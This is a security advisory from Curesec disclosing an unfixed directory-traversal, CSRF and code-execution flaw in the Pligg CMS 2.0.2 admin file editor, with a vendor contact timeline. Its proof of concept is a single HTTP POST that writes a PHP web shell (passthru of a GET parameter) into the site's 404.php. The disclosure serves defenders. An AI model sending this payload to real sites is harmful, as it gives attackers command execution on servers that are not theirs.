52 lines
No EOL
1.7 KiB
Text
52 lines
No EOL
1.7 KiB
Text
Security Advisory - Curesec Research Team
|
|
|
|
1. Introduction
|
|
|
|
Affected Product: Pligg CMS 2.0.2
|
|
Fixed in: not fixed
|
|
Fixed Version Link: n/a
|
|
Vendor Website: http://pligg.com/
|
|
Vulnerability Type: Code Execution & CSRF
|
|
Remote Exploitable: Yes
|
|
Reported to vendor: 09/01/2015
|
|
Disclosed to public: 10/07/2015
|
|
Release mode: Full Disclosure
|
|
CVE: n/a
|
|
Credits Tim Coen of Curesec GmbH
|
|
|
|
2. Vulnerability Description
|
|
|
|
The file editor provides the possibility to edit .tpl files stored in the
|
|
templates directory.
|
|
|
|
But the file editor is vulnerable to directory traversal when saving files, and
|
|
it does not check the submitted filename against a whitelist of allowed files.
|
|
It also does not check the file extension. Because of this, it is possible to
|
|
gain code execution.
|
|
|
|
Admin credentials are required to access the file editor, but the request does
|
|
not have CSRF protection, so an attacker can gain code execution by getting the
|
|
admin to visit a website they control while logged in.
|
|
|
|
3. Proof of Concept
|
|
|
|
|
|
POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1
|
|
|
|
the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes
|
|
|
|
4. Solution
|
|
|
|
This issue was not fixed by the vendor.
|
|
|
|
5. Report Timeline
|
|
|
|
09/01/2015 Informed Vendor about Issue (no reply)
|
|
09/22/2015 Reminded Vendor of disclosure date
|
|
09/22/2015 Vendor replied, issue has been send to staff
|
|
09/29/2015 Reminded Vendor of disclosure date (no reply)
|
|
10/07/2015 Disclosed to public
|
|
|
|
|
|
Blog Reference:
|
|
http://blog.curesec.com/article/blog/Pligg-CMS-202-Code-Execution--CSRF-80.html |